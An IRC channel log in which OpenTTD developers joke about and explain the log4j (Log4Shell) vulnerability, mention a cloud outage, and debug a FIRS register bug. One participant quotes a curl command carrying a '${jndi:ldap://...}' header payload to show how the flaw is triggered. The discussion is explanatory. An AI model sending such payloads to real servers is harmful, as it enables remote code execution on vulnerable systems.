Times are UTC
12:56:43 *** WormnestAndroid has joined #openttd
13:42:46 *** sla_ro|master has quit IRC
14:01:36 <peter1138> I've used goto in some c# source...
14:01:45 <peter1138> Perhaps I need to reevaluate my life.
14:06:46 *** Etua has joined #openttd
14:18:42 *** Etua has quit IRC
14:24:16 *** Etua has joined #openttd
14:29:39 *** nielsm has joined #openttd
14:30:12 *** Etua has quit IRC
14:49:00 *** gelignite has joined #openttd
14:55:10 *** glx has joined #openttd
14:55:10 *** ChanServ sets mode: +v glx
14:56:19 *** colde_ has joined #openttd
14:57:10 *** gregdek_ has joined #openttd
14:57:54 *** mindlesstux_ has joined #openttd
14:58:16 *** colde has quit IRC
14:58:16 *** colde_ is now known as colde
14:59:31 *** gregdek has quit IRC
14:59:31 *** gregdek_ is now known as gregdek
15:00:56 *** mindlesstux has quit IRC
15:00:56 *** mindlesstux_ is now known as mindlesstux
15:01:41 *** ST2 has quit IRC
15:02:43 *** ST2 has joined #openttd
16:04:47 *** andythenorth has joined #openttd
16:04:50 <andythenorth> lol
16:05:05 <andythenorth> AWS, Cloudflare availability issues
16:05:08 <andythenorth> so NPM is down
16:05:13 <andythenorth> amongst other things
16:09:35 <LordAro> ah, that'll be why i couldn't download something a while ago
16:09:47 <TrueBrain> Hi andythenorth, https://log4jmemes.com/, love, TrueBrain
16:10:24 <andythenorth> this one is inaccurate https://dl.airtable.com/.attachments/2f7c668073cee9ddcb71ba2091a0ef2a/ad0d0c80/KDnmlxQ.png
16:10:34 *** Wormnest has joined #openttd
16:10:43 <TrueBrain> And cloudflare? Or cloudfront?
16:10:58 <dwfreed> I wonder if there's log4j in smart cards
16:11:01 * dwfreed ducks
16:11:08 <dwfreed> or blu-ray players
16:11:19 <andythenorth> I have to check my mesh wifi provider
16:11:24 <LordAro> or SIM cards
16:11:36 <andythenorth> does it matter if it's in the SIMs?
16:11:41 <andythenorth> it will be in the telco networks
16:11:57 <andythenorth> we are currently doing full DR planning
16:12:15 <dwfreed> LordAro: arguably SIM cards are just a subclass of smart cards :P
16:13:56 <LordAro> arguably, yes
16:39:01 *** iSoSyS has joined #openttd
17:09:13 *** frosch123 has joined #openttd
17:16:27 <frosch123> https://twitter.com/TheASF/status/1400875147163279374
17:17:06 <LordAro> oh no
17:17:35 *** Flygon has quit IRC
17:17:39 <frosch123> finally a good joke about *remote* code execution
17:55:10 <andythenorth> GG
18:07:39 <TrueBrain> I wonder how long the firmware update takes :P
18:09:05 <frosch123> esp. when the connection is already fully utilized by coin miners
18:23:47 <frosch123> hmm, i am not fluent enough in java to understand the root cause. is it because java has no warning "format not a string literal"?
18:24:44 <frosch123> and people logging strings directly using "logger.info(foo)", when they should use "logger.info("{}", foo)"?
18:26:01 <LordAro> also that one of those is essentially `eval <result from 3rdparty server>`
18:27:08 <frosch123> well, that's my main issue with the news... everyone talks about "there is a string formatter to execute code", but imho "external messages can contain format codes" is still broken
18:27:37 <frosch123> does no one care if "harmless string substitution" results in mess in the log file?
18:28:25 <frosch123> all the log4j patching feels like hiding/working around/mitigating a bug, instead of fixing it
18:28:29 <LordAro> mm, i'm not sure either
18:30:27 <LordAro> https://logging.apache.org/log4j/2.x/manual/api.html certainly suggests that you can do it without that
18:30:56 <LordAro> unless string parameters are also evaluated? which seems nuts, but so does the ability for your logging framework to make web requests
18:31:22 <frosch123> oof, that example in "substituting parameters"...
18:31:49 <frosch123> it shows both methods
18:32:39 <frosch123> C people learned that the first version is invalid, and added warnings/errors. did java just miss that call?
18:34:25 <frosch123> oh, maybe the docs read like: "info("str" + foo)" is log4j 1.x, and "info("str {}", foo)" is log4j 2.x
18:34:40 <frosch123> though that does not make it any better
18:57:24 <andythenorth> so are we now mining on the moon?
18:58:32 <andythenorth> from what I read the log4j vuln is not a bug, it's firmly a feature, essential for backwards compatibility with the ecosystem
18:58:36 <andythenorth> in ways I didn't understand
18:58:45 <andythenorth> but I suspect LordAro has the appropriate XKCD to hand
19:13:02 <LordAro> 1172 or 972, perhaps?
19:13:05 <LordAro> or 1700
19:14:23 <andythenorth> 1700 is rather good
19:14:38 <andythenorth> I think 1172 is pertinent
19:16:21 <TrueBrain> frosch123: https://www.lunasec.io/docs/blog/log4j-zero-day/ to understand it in technical terms
19:16:40 <TrueBrain> but basically, no, escaping wasn't the issue on a user-level (from what I understand)
19:17:19 <TrueBrain> log.info("Requested Api Version:{}", apiVersion);
19:17:19 <TrueBrain> in a nutshell
19:17:19 <TrueBrain> curl 127.0.0.1:8080 -H 'X-Api-Version: ${jndi:ldap://127.0.0.1/a}'
19:18:58 <TrueBrain> so the first shitty thing is that the jndi thing makes an external call, which of course is bananas on its own
19:19:16 <TrueBrain> the second shitty thing is that if you return a Java class, it is being executed, for "backwards compatible" reasons :P
19:19:34 <TrueBrain> (and that is why it carries a score of 10 (out of 10))
19:21:23 <TrueBrain> andythenorth: no, the xkcd has been replaced by https://dl.airtable.com/.attachments/fc40ade9c20d8620461f8cb358b2467a/8006943c/image2.png
19:22:59 <andythenorth> the most important thing apparently was 'log for jay' or 'log forge'
19:23:11 <andythenorth> this is like PNG all over again
19:24:24 *** sla_ro|master has joined #openttd
19:28:00 <frosch123> TrueBrain: thanks, so format substitution happens multiple times then..
19:28:30 <frosch123> xkcd 1700 is in fact pretty close :)
19:30:16 <andythenorth> like a prediction
19:30:40 <andythenorth> part of our infosec stance is based on 'act as though everything is probably already owned'
19:30:47 <andythenorth> and this year we got to find out why
19:41:31 <frosch123> this year a lot of things failed :) fb, aws, java-everything, my ipv6 connection, ...
19:42:22 *** Wormnest has quit IRC
19:48:01 <andythenorth> FIRS
19:48:19 <andythenorth> 4.4.0 has a bug that wipes out the value of perm register 2 sometimes, for reasons I don't see
19:48:38 <andythenorth> discord player gave me a confirmed repro of the result via screenshot
19:48:43 <andythenorth> but I don't know the trigger
19:49:25 *** WormnestAndroid has quit IRC
19:49:37 <andythenorth> there are no other registers getting obviously zero-ed so I suspect 100% chance it's my code, not openttd
19:50:01 <frosch123> just set a watchpoint :p
19:50:04 <andythenorth> unless sometimes certain callbacks can run closely and out of sequence
19:51:16 <frosch123> what does that mean? are you using the register as a message queue between callbacks?
19:57:36 * andythenorth looks
19:57:47 <andythenorth> I suspect maybe multiple callbacks write to it
20:02:37 <andythenorth> seems not, in 4.4.0 at least
20:02:52 <andythenorth> I have rewritten some of these subsequently, not released
20:04:39 <glx> maybe you need to search for all psto in the generated nfo
20:05:41 <frosch123> i would assume if andy uses one write-storage in a pynml template, it results in 1M instances in the nfo :)
20:06:05 <glx> yeah but with different values
20:06:37 <andythenorth> the behaviour apparently arises randomly
20:06:41 <glx> and as I understand the report on discord it doesn't happen for all industries
20:06:41 <andythenorth> with no obvious repro
20:07:12 <glx> hand placed ones don't trigger the issue, only random placed ones
20:07:51 <andythenorth> I've never seen it in any test game either
20:08:23 <andythenorth> n
20:08:32 <andythenorth> lol mistype
20:10:17 *** Wolf01 has joined #openttd
20:10:27 *** Wormnest has joined #openttd
20:24:21 <glx> I found 17 STORE_PERM, but I don't understand their meaning :)
20:26:13 <andythenorth> I only see storage 2 written once per industry
20:26:32 *** nielsm has quit IRC
20:48:35 *** Eddi|zuHause is now known as Eddi|zuHause2
21:16:51 *** frosch123 has quit IRC
21:27:46 *** andythenorth has quit IRC
21:29:30 *** Eddi|zuHause2 is now known as Eddi|zuHause
21:34:17 *** andythenorth has joined #openttd
21:57:04 *** WormnestAndroid has joined #openttd
21:59:03 *** andythenorth has quit IRC
22:15:45 *** _aD has joined #openttd
22:15:58 *** Wormnest has quit IRC
22:16:30 *** WormnestAndroid has quit IRC
22:17:56 *** Wolf01 has quit IRC
22:18:48 *** WormnestAndroid has joined #openttd
22:32:53 *** gelignite has quit IRC
22:40:36 *** Wormnest has joined #openttd
23:06:30 *** sla_ro|master has quit IRC